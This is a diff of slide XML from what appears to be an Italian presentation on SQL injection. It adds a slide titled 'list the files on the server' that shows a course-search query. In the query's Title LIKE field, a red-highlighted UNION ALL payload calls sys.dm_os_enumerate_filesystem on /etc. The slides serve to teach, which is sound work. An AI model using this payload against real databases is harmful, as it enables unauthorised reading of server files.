-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52626A5-45A6-18D0-7613-BFA863290EEE}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr lvl="0" algn="ctr"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Elencare</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> file </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>sul</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> server*</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="129" name="Google Shape;129;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FCEF64-BAEF-0734-31E9-C46228160C64}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="130" name="Google Shape;130;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A27826-F33A-EF78-7EE7-57721E61D1C3}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1128450" y="2195169"/>
-            <a:ext cx="6887100" cy="2292051"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="127000" lvl="0">
-              <a:lnSpc>
-                <a:spcPct val="115000"/>
-              </a:lnSpc>
-              <a:buClr>
-                <a:srgbClr val="D93232"/>
-              </a:buClr>
-              <a:buSzPts val="1600"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>SELECT</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	Id, Title, StartDate, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>EndDate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, Result, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>dbo.Courses</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>WHERE </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>UserId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>{</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:schemeClr val="accent5">
-                    <a:lumMod val="60000"/>
-                    <a:lumOff val="40000"/>
-                  </a:schemeClr>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>userId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="accent1"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>}</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>	AND Title LIKE '%</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>full_filesystem_path</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>sys.dm_os_enumerate_filesystem</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>('/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>etc</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>','*.*') ORDER BY 2--</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>%' ORDER BY StartDate;</a:t>
-            </a:r>
-            <a:endParaRPr sz="1400" dirty="0">
-              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131889864"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -20455,7 +21001,15 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> query semplice </a:t>
+              <a:t> query </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>innocua</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -20575,6 +21129,367 @@
 </file>
 
 <file path=ppt/slides/slide30.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA86480F-F968-3F96-96E7-A605D3160EED}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52626A5-45A6-18D0-7613-BFA863290EEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Elencare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> file </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server*</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FCEF64-BAEF-0734-31E9-C46228160C64}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62A27826-F33A-EF78-7EE7-57721E61D1C3}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>' UNION ALL SELECT NULL, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>full_filesystem_path</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, NULL, NULL, NULL, NULL FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sys.dm_os_enumerate_filesystem</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>('/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>','*.*') ORDER BY 2--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2131889864"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -20917,7 +21832,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21260,7 +22175,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21603,7 +22518,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -21722,10 +22637,10 @@
       </p:pic>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2" descr="A pair of handcuffs on a black background&#10;&#10;AI-generated content may be incorrect.">
+          <p:cNvPr id="4" name="Picture 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18912161-9C4B-91DC-0973-35DD06817AE0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D755FCC-4ABD-00BB-6CC0-DD380C12BD24}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -21742,8 +22657,8 @@
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3580702" y="2199023"/>
-            <a:ext cx="1982595" cy="1982595"/>
+            <a:off x="1688631" y="2027670"/>
+            <a:ext cx="5766738" cy="2180183"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -21763,7 +22678,197 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide34.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9B7C7E-CFB0-1A67-52EC-00BE10D91F19}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C420A99-8D1E-F15B-3A68-9B6CFDA4F5A4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1290150" y="1454970"/>
+            <a:ext cx="6563700" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
